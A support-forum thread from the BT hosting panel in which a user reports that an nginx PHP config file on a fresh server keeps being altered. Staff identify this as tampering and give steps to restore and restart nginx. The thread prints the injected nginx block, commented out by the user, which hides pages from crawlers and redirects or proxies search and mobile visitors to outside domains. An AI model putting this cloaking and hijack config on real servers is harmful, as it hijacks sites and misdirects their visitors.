【已完成】enable-php-74.conf文件就被篡改了

本帖最后由堡塔运维香菜卷于 2023-5-20 21:02 编辑

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：7.9.9

系统版本：centos7

问题描述：刚安装完宝塔，还没放任何项目，enable-php-74.conf文件就被篡改了，我注释了代理代码后，发现过几天就又有了，

相关截图（日志、错误）：

kqcdam · 发表于 2023-4-23 18:59:17

location ~ [^/]\.php(/|$)
{
      try_files $uri =404;
      fastcgi_pass  unix:/tmp/php-cgi-74.sock;
      fastcgi_index index.php;
      include fastcgi.conf;
      include pathinfo.conf;
}
#  location /robots{
#    if ($http_user_agent ~* (baiduspider|googlebot|Bytespider|soso|bing|sogou|yahoo|Bytespider|sohu-search|yodao|robozilla|msnbot|yisouspider|360Spider)) {
#       return 404;
#    }
#  }
#  location /mh {
#       set $flag 0;
#    if ($http_user_agent ~* (baiduspider|googlebot|Bytespider|soso|bing|sogou|yahoo|Bytespider|sohu-search|yodao|robozilla|msnbot|yisouspider|360Spider)) {
#          set $flag 1;}
# if ($http_referer ~* (m.baidu.com|m.sogou.com|wap.baidu.com|3g.baidu.com|sogou.com|toutiao.com|.so.com|.sm.cn)){
#       rewrite ^/(.*)$ https://www.yjdm277.com/? permanent;
#    }

# if ($http_referer ~* (site:|site%|=site|inurl|inurl:|inurl%)){
#       set $flag 0;
#    }
#    if ($flag = 0) {
#       return 404;
#    }
#    proxy_pass    http://p.nfdahk.com/?&;
#    proxy_connect_timeout 60;
#    proxy_read_timeout    60;
#    proxy_send_timeout    60;
#    proxy_buffer_size    32k;
#    proxy_buffers          4    32k;
#    proxy_busy_buffers_size 64k;
#    proxy_temp_file_write_size    1024m;
#    proxy_set_header       X-Real-IP    $remote_addr;
#    proxy_set_header       X-Forwarded-For $proxy_add_x_forwarded_for;
#  }

kqcdam · 发表于 2023-4-23 19:00:22

下面这段代码是被篡改后的enable-php-74.conf文件，，我又给注释了，请帮忙看看这是什么问题，是不是宝塔有bug

盏尽 · 发表于 2023-4-23 21:19:03

您好，这不是面板bug，您这应该是被篡改了，你可以按照以下步骤进行修复：
1. 登录宝塔面板，进入网站管理页面。
2. 在网站列表中找到受影响的网站，点击右侧的【文件管理】进入文件管理页面。
3. 使用文件管理器，找到网站的配置文件目录，该文件在 /www/server/nginx/conf/enable-php-74.conf。
4. 找到并打开受影响的 enable-php-74.conf 文件。
5. 将文件内容还原成原始状态，并保存修改。
6. 重新启动 Nginx 服务，确保配置生效。在 Linux 中，可以使用以下命令重启 Nginx 服务：

/etc/init.d/nginx restart

复制代码

若Nginx正常运行，则会输出 "(running)" 表示服务正在运行。
建议你对系统进行彻底的检查，确保你的系统没有被黑客入侵，并且将安全措施升级以避免安全问题的再次发生。
我们面板的软件商店有web防火墙、系统加固、防篡改等安全软件，您可安装这类的安全软件进行防护

kqcdam · 发表于 2023-4-24 18:18:55

好的，多谢

█菠萝云买2送1活动！12G内存99元	阿里云国际低折扣多云自助平台	APP分发-无行业限制免审核	A4招租，联系qq394030111	A5招租，联系qq394030111
高防服务器，无视一切流量攻击	【阿里云】宝塔一键部署，低至5折	A8招租，联系qq394030111	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
█ 易探云·香港/美国vps仅9元 █	▶CPS云◀海外大带宽vps服务器	OV/EV SSL证书，可当日签发	【云防护】专注域名和网站安全防护	A15招租，联系qq394030111